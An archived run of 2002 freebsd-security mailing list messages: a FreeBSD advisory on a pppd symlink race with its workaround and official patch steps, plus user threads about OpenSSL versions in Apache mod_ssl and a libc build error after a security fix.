amavis-20020220 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks, looks like my local copy libphp4.so as well :-( Anyone know of any other apps statically compiled with bits of the vulnerable openssl out of the ports that would be affected ? ---Mike At 10:56 AM 7/31/2002 +0200, Sune Stjerneby wrote: >Mike Tancsa writes: > >After a buildworld, do I need to worry about apache with mod_ssl ? Are > >there parts that are statically compiled using openSSL ? > >I suspect so, > >% strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6" >OpenSSL 0.9.6a 5 Apr 2001 > >After a rebuild, it reads "OpenSSL 0.9.6e 30 Jul 2002" in >apache/libssl.so. > >-- >Sune Stjerneby > % bloto flem rech rech kini -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 5: 3:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 00A5437B400; Wed, 31 Jul 2002 05:03:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5DF8443E6E; Wed, 31 Jul 2002 05:02:30 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: from freefall.freebsd.org (nectar@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VC2JJU023559; Wed, 31 Jul 2002 05:02:19 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: (from nectar@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VC2Jj4023557; Wed, 31 Jul 2002 05:02:19 -0700 (PDT) Date: Wed, 31 Jul 2002 05:02:19 -0700 (PDT) Message-Id: <200207311202.g6VC2Jj4023557@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-02:32.pppd Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-02:32.pppd Security Advisory The FreeBSD Project Topic: exploitable race condition in pppd Category: core Module: pppd Announced: 2002-07-31 Credits: Sebastian Krahmer Affects: All releases of FreeBSD up to and including 4.6.1-RELEASE-p1 Corrected: 2002-07-30 03:50:40 UTC (RELENG_4) 2002-07-30 19:15:52 UTC (RELENG_4_6) 2002-07-30 19:16:46 UTC (RELENG_4_5) 2002-07-30 19:17:27 UTC (RELENG_4_4) FreeBSD only: NO I. Background FreeBSD ships with several implementations of the Point-to-Point Protocol (PPP). The pppd program is one of these implementations. It provides basic support for negotiating a link, while encapsulation is done by driver code in the kernel. II. Problem Description A race condition exists in the pppd program that may be exploited in order to change the permissions of an arbitrary file. The file specified as the tty device is opened by pppd, and the permissions are recorded. If pppd fails to initialize the tty device in some way (such as a failure of tcgetattr(3)), then pppd will then attempt to restore the original permissions by calling chmod(2). The call to chmod(2) is subject to a symlink race, so that the permissions may `restored' on some other file. Note that the pppd program is installed set-user-ID to root, so that any file's permissions may be changed in this fashion. III. Impact A malicious local user may exploit the race condition to acquire write permissions to a critical system file, such as /etc/crontab, and leverage the situation to acquire escalated privileges. In FreeBSD 4.4-RELEASE and later, the local user must be in group `dialer' in order to run pppd and attempt to exploit this race. IV. Workaround Remove the set-user-ID bit from pppd by executing the following command as root: # chmod u-s /usr/sbin/pppd V. Solution Do one of the following: 1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p2, 4.5-RELEASE-p11, or 4.4-RELEASE-p18). 2) To patch your present system: The following patch has been verified to apply to FreeBSD 4.4, 4.5, and 4.6 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:32/pppd.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:32/pppd.patch.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch # cd /usr/src/usr.sbin/pppd # make depend && make && make install VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Path Revision Branch - ------------------------------------------------------------------------- usr.sbin/pppd/main.c RELENG_4 1.19.2.1 RELENG_4_6 1.19.10.1 RELENG_4_5 1.19.8.1 RELENG_4_4 1.19.6.1 sys/conf/newvers.sh RELENG_4_6 1.44.2.23.2.7 RELENG_4_5 1.44.2.20.2.12 RELENG_4_4 1.44.2.17.2.17 - ------------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iQCVAwUBPUfQ4VUuHi5z0oilAQGaYwP/djtLXxRveB2xDy54hACNSArKnfAbEwEP PisB8Er2Zl4CmwnKx3BO8zWoV+nb7afcWGoy2eU14b/sXTLpInpx+823J8nP3BUK bsUInanuFxX6LfSTbzjRT+8wxxXKO4oarPFfxfVis09ekjO+FqTtm2pAV13ug/+s Wrb8IG4YYVA= =tfMD -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 6:30:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4122137B400 for ; Wed, 31 Jul 2002 06:30:17 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8E11A43E42 for ; Wed, 31 Jul 2002 06:30:15 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6VDU65H028342 for ; Wed, 31 Jul 2002 15:30:08 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6VDU4c7028320 for ; Wed, 31 Jul 2002 15:30:04 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: Are OpenSSL bugs related to OpenSSH ? Date: Wed, 31 Jul 2002 15:26:29 +0200 X-Mailer: Dinoex 1.79 References: <1028113366.1406.0.camel@linux> <200207311127.g6VBRWY98818@www.wsf.at> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-Accept-Language: de,en X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-No-Archive: yes X-ZC-VIA: 20020731000000S+2@dinoex.sub.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > BTW: which version of OpenSSL bumped so.2 -> so.3 ? http://www.FreeBSD.org/cgi/cvsweb.cgi/ports/security/openssl/Makefile?rev=1.58&content-type=text/x-cvsweb-markup otherwise configure scripts fails, detecting new headers and old libs. E.g. /lib/libsssl.so.2 will be prefered over an existing and newer /usr/local/lib/libsssl.so.2 To keep ports working, I bumped the Version back then. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 8:16:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7BAF237B400 for ; Wed, 31 Jul 2002 08:16:09 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id F1D9743E65 for ; Wed, 31 Jul 2002 08:16:08 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 856D03C; Wed, 31 Jul 2002 10:16:08 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6VFG8U4027015; Wed, 31 Jul 2002 10:16:08 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6VFG8nx027014; Wed, 31 Jul 2002 10:16:08 -0500 (CDT) Date: Wed, 31 Jul 2002 10:16:07 -0500 From: "Jacques A. Vidrine" To: Dirk Meyer Cc: freebsd-security@FreeBSD.ORG Subject: Re: Are OpenSSL bugs related to OpenSSH ? Message-ID: <20020731151607.GD26793@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Dirk Meyer , freebsd-security@FreeBSD.ORG References: <1028113366.1406.0.camel@linux> <200207311127.g6VBRWY98818@www.wsf.at> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jul 31, 2002 at 03:26:29PM +0200, Dirk Meyer wrote: > > > BTW: which version of OpenSSL bumped so.2 -> so.3 ? > > http://www.FreeBSD.org/cgi/cvsweb.cgi/ports/security/openssl/Makefile?rev=1.58&content-type=text/x-cvsweb-markup > > otherwise configure scripts fails, > detecting new headers and old libs. E.g. /lib/libsssl.so.2 will > be prefered over an existing and newer /usr/local/lib/libsssl.so.2 > > To keep ports working, I bumped the Version back then. I think the configure script is broken, and having the port library version number artificially higher is not a great idea. :-( Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 8:37:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7A60837B400 for ; Wed, 31 Jul 2002 08:37:34 -0700 (PDT) Received: from smtpout.mac.com (smtpout.mac.com [204.179.120.85]) by mx1.FreeBSD.org (Postfix) with ESMTP id 006EB43E4A for ; Wed, 31 Jul 2002 08:37:34 -0700 (PDT) (envelope-from wincentcolaiuta@mac.com) Received: from smtp-relay04-en1.mac.com (smtp-relay04-en1 [10.13.10.223]) by smtpout.mac.com (8.12.1/8.10.2/1.0) with ESMTP id g6VFbX0a013514 for ; Wed, 31 Jul 2002 08:37:33 -0700 (PDT) Received: from asmtp02.mac.com (asmtp02-qfe3.mac.com [10.13.10.66]) by smtp-relay04-en1.mac.com (8.12.1/8.12.1/1.0) with ESMTP id g6VFbX72000669 for ; Wed, 31 Jul 2002 08:37:33 -0700 (PDT) Received: from cannondale.elcentro.red ([202.45.118.112]) by asmtp02.mac.com (Netscape Messaging Server 4.15) with ESMTP id H04E2H00.H49 for ; Wed, 31 Jul 2002 08:37:29 -0700 Date: Thu, 1 Aug 2002 01:07:20 +0930 Subject: Problem updating with RELENG_4_6 branch [stdio fix] Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) From: Wincent Colaiuta To: freebsd-security@FreeBSD.ORG Content-Transfer-Encoding: 7bit In-Reply-To: Message-Id: <67229600-A49B-11D6-9DBA-003065C60B4C@mac.com> X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Just wondering if anyone has had any troubles updating their systems in light of the recent security notification (FreeBSD-SA-02:23.stdio [REVISED]). I decided to update by rebuilding the world, and after a fresh cvsup of the RELENG_4_6 branch, I get the following error during the "make buildworld" in /usr/src/lib/libc: > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c > /usr/src/lib/libc/../libc/xdr/xdr_array.c -o xdr_array.o > /usr/src/lib/libc/../libc/xdr/xdr_array.c: In function `xdr_array': > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: `UINT_MAX' undeclared > (first use in this function) > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: (Each undeclared > identifier is reported only once > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: for each function it > appears in.) > *** Error code 1 > > Stop in /usr/src/lib/libc. > *** Error code 1 > > Stop in /usr/src/lib. > *** Error code 1 > > Stop in /usr/src. > *** Error code 1 > > Stop in /usr/src. > *** Error code 1 > > Stop in /usr/src. I re-did the cvsup just to be sure, and did a "make clean" in /usr/src just to be sure, but it failed again on the second attempt in the same way... Anyone else seen this or got any pointers? Or is this a question better posted to freebsd-questions? (apologies if this is the case). The last make world I did was the update to 4.6.1-RELEASE #0 and that went fine... Cheers Wincent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 8:44:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D617837B400 for ; Wed, 31 Jul 2002 08:44:45 -0700 (PDT) Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by mx1.FreeBSD.org (Postfix) with ESMTP id B295D43E3B for ; Wed, 31 Jul 2002 08:43:44 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id BAA14594; Thu, 1 Aug 2002 01:42:33 +1000 (EST) From: Darren Reed Message-Id: <200207311542.BAA14594@caligula.anu.edu.au> Subject: Re: Problem updating with RELENG_4_6 branch [stdio fix] To: wincentcolaiuta@mac.com (Wincent Colaiuta) Date: Thu, 1 Aug 2002 01:42:32 +1000 (Australia/ACT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <67229600-A49B-11D6-9DBA-003065C60B4C@mac.com> from "Wincent Colaiuta" at Aug 01, 2002 01:07:20 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Wincent Colaiuta, sie said: > > Just wondering if anyone has had any troubles updating their systems in > light of the recent security notification (FreeBSD-SA-02:23.stdio > [REVISED]). > > I decided to update by rebuilding the world, and after a fresh cvsup of > the RELENG_4_6 branch, I get the following error during the "make > buildworld" in /usr/src/lib/libc: > > > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include > > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE > > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c > > /usr/src/lib/libc/../libc/xdr/xdr_array.c -o xdr_array.o > > /usr/src/lib/libc/../libc/xdr/xdr_array.c: In function `xdr_array': > > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: `UINT_MAX' undeclared > > (first use in this function) > > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: (Each undeclared > > identifier is reported only once > > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: for each function it > > appears in.) My mistake. This has been fixed in CVS already. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 8:50:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C35DC37B406 for ; Wed, 31 Jul 2002 08:50:34 -0700 (PDT) Received: from inord.no (oluf.et-n.no [213.161.160.12]) by mx1.FreeBSD.org (Postfix) with ESMTP id DD66D43E81 for ; Wed, 31 Jul 2002 08:50:20 -0700 (PDT) (envelope-from erik@pentadon.com) Received: from erikpc [213.161.168.206] by inord.no (SMTPD32-7.06) id A62A908200F6; Wed, 31 Jul 2002 17:45:46 +0200 Message-ID: <007001c238aa$24b25d20$0200000a@erikpc> From: =?iso-8859-1?Q?Erik_Paulsen_Sk=E5lerud?= To: "Wincent Colaiuta" , References: <67229600-A49B-11D6-9DBA-003065C60B4C@mac.com> Subject: Re: Problem updating with RELENG_4_6 branch [stdio fix] Date: Wed, 31 Jul 2002 17:51:32 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org paste from freebsd-stable@freebsd.org: On Wed, Jul 31, 2002 at 03:45:51PM +0100, Nick Hilliard wrote: > Today's xdr mfc to the security branches boobed up a little. It looks > like xdr_array.c needs to #include . Yes, sorry. I just fixed it in RELENG_4. I will fix it shortly in the other RELENG_4_* branches, and in -CURRENT. -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se ----- Original Message ----- From: "Wincent Colaiuta" To: Sent: Wednesday, July 31, 2002 5:37 PM Subject: Problem updating with RELENG_4_6 branch [stdio fix] > Just wondering if anyone has had any troubles updating their systems in > light of the recent security notification (FreeBSD-SA-02:23.stdio > [REVISED]). > > I decided to update by rebuilding the world, and after a fresh cvsup of > the RELENG_4_6 branch, I get the following error during the "make > buildworld" in /usr/src/lib/libc: > > > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include > > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE > > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c > > /usr/src/lib/libc/../libc/xdr/xdr_array.c -o xdr_array.o > > /usr/src/lib/libc/../libc/xdr/xdr_array.c: In function `xdr_array': > > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: `UINT_MAX' undeclared > > (first use in this function) > > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: (Each undeclared > > identifier is reported only once > > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: for each function it > > appears in.) > > *** Error code 1 > > > > Stop in /usr/src/lib/libc. > > *** Error code 1 > > > > Stop in /usr/src/lib. > > *** Error code 1 > > > > Stop in /usr/src. > > *** Error code 1 > > > > Stop in /usr/src. > > *** Error code 1 > > > > Stop in /usr/src. > > I re-did the cvsup just to be sure, and did a "make clean" in /usr/src > just to be sure, but it failed again on the second attempt in the same > way... Anyone else seen this or got any pointers? Or is this a question > better posted to freebsd-questions? (apologies if this is the case). > > The last make world I did was the update to 4.6.1-RELEASE #0 and that > went fine... > > Cheers > Wincent > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 9: 5:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D5F9D37B406 for ; Wed, 31 Jul 2002 09:05:36 -0700 (PDT) Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 468D943E6A for ; Wed, 31 Jul 2002 09:05:36 -0700 (PDT) (envelope-from schulte+freebsd@nospam.schulte.org) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id DCDA9243C0; Wed, 31 Jul 2002 10:47:18 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (carpnod.schulte.org [209.134.156.200]) by clink.schulte.org (Postfix) with ESMTP id D749C243BE; Wed, 31 Jul 2002 10:47:16 -0500 (CDT) Message-Id: <5.1.1.6.2.20020731104559.060d3900@localhost> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Wed, 31 Jul 2002 10:46:49 -0500 To: Wincent Colaiuta , freebsd-security@FreeBSD.ORG From: Christopher Schulte Subject: Re: Problem updating with RELENG_4_6 branch [stdio fix] In-Reply-To: <67229600-A49B-11D6-9DBA-003065C60B4C@mac.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 01:07 AM 8/1/2002 +0930, Wincent Colaiuta wrote: >Just wondering if anyone has had any troubles updating their systems in >light of the recent security notification (FreeBSD-SA-02:23.stdio [REVISED]). > >I decided to update by rebuilding the world, and after a fresh cvsup of >the RELENG_4_6 branch, I get the following error during the "make >buildworld" in /usr/src/lib/libc: > >>cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include >>-D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE >>-I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c >>/usr/src/lib/libc/../libc/xdr/xdr_array.c -o xdr_array.o >>/usr/src/lib/libc/../libc/xdr/xdr_array.c: In function `xdr_array': >>/usr/src/lib/libc/../libc/xdr/xdr_array.c:80: `UINT_MAX' undeclared >>(first use in this function) >>/usr/src/lib/libc/../libc/xdr/xdr_array.c:80: (Each undeclared identifier >>is reported only once >>/usr/src/lib/libc/../libc/xdr/xdr_array.c:80: for each function it >>appears in.) Discussed in -stable, a fix should already be in the tree. -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 9:19:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 40FD937B400 for ; Wed, 31 Jul 2002 09:19:22 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 93F1343E3B for ; Wed, 31 Jul 2002 09:19:21 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.5) with ESMTP id g6VGJKls030520 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK); Wed, 31 Jul 2002 12:19:21 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.5/Submit) id g6VGJKba030517; Wed, 31 Jul 2002 12:19:20 -0400 (EDT) (envelope-from wollman) Date: Wed, 31 Jul 2002 12:19:20 -0400 (EDT) From: Garrett Wollman Message-Id: <200207311619.g6VGJKba030517@khavrinen.lcs.mit.edu> To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: apache mod_ssl ? In-Reply-To: <5.1.0.14.0.20020731075521.04b14d70@192.168.0.12> References: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> <20020731085657.GA33775@fnyx.vmunix.dk> <5.1.0.14.0.20020731075521.04b14d70@192.168.0.12> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: >> % strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6" >> OpenSSL 0.9.6a 5 Apr 2001 `ldd' will demonstrate that this string, whatever its function, does not come from the OpenSSL library. (The version of OpenSSL in FreeBSD has been 0.9.6c for quite some time.) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 9:33: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4441A37B401 for ; Wed, 31 Jul 2002 09:33:01 -0700 (PDT) Received: from thought.holo.org (w120.z064002057.sjc-ca.dsl.cnc.net [64.2.57.120]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4553D43E31 for ; Wed, 31 Jul 2002 09:33:00 -0700 (PDT) (envelope-from bwb@holo.org) Received: from localhost (localhost [127.0.0.1]) by thought.holo.org (8.12.5/8.12.5) with ESMTP id g6VGXCFT002865; Wed, 31 Jul 2002 09:33:12 -0700 (PDT) (envelope-from bwb@holo.org) Date: Wed, 31 Jul 2002 09:33:12 -0700 (PDT) From: Brian Buchanan To: Garrett Wollman Cc: Mike Tancsa , Subject: Re: apache mod_ssl ? In-Reply-To: <200207311619.g6VGJKba030517@khavrinen.lcs.mit.edu> Message-ID: <20020731093047.J395-100000@thought.holo.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 31 Jul 2002, Garrett Wollman wrote: > < said: > > >> % strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6" > >> OpenSSL 0.9.6a 5 Apr 2001 > > `ldd' will demonstrate that this string, whatever its function, does > not come from the OpenSSL library. (The version of OpenSSL in FreeBSD > has been 0.9.6c for quite some time.) > -stable hasn't been at 0.9.6c. FreeBSD 4.6-STABLE #3: Sat Jul 27 15:04:46 PDT 2002 > openssl version OpenSSL 0.9.6a 5 Apr 2001 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 9:35:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 625BD37B401 for ; Wed, 31 Jul 2002 09:35:43 -0700 (PDT) Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by mx1.FreeBSD.org (Postfix) with ESMTP id C187143E31 for ; Wed, 31 Jul 2002 09:35:42 -0700 (PDT) (envelope-from gshapiro@gshapiro.net) Received: from horsey.gshapiro.net (gshapiro@localhost [IPv6:::1]) by horsey.gshapiro.net (8.12.5/8.12.5) with ESMTP id g6VGZgvE042314 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Wed, 31 Jul 2002 09:35:42 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.5/8.12.5/Submit) id g6VGZgEP042311; Wed, 31 Jul 2002 09:35:42 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15688.4573.994723.53961@horsey.gshapiro.net> Date: Wed, 31 Jul 2002 09:35:41 -0700 From: Gregory Neil Shapiro To: Garrett Wollman Cc: Mike Tancsa , security@FreeBSD.ORG Subject: Re: apache mod_ssl ? In-Reply-To: <200207311619.g6VGJKba030517@khavrinen.lcs.mit.edu> References: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> <20020731085657.GA33775@fnyx.vmunix.dk> <5.1.0.14.0.20020731075521.04b14d70@192.168.0.12> <200207311619.g6VGJKba030517@khavrinen.lcs.mit.edu> X-Mailer: VM 7.03 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid Sender: 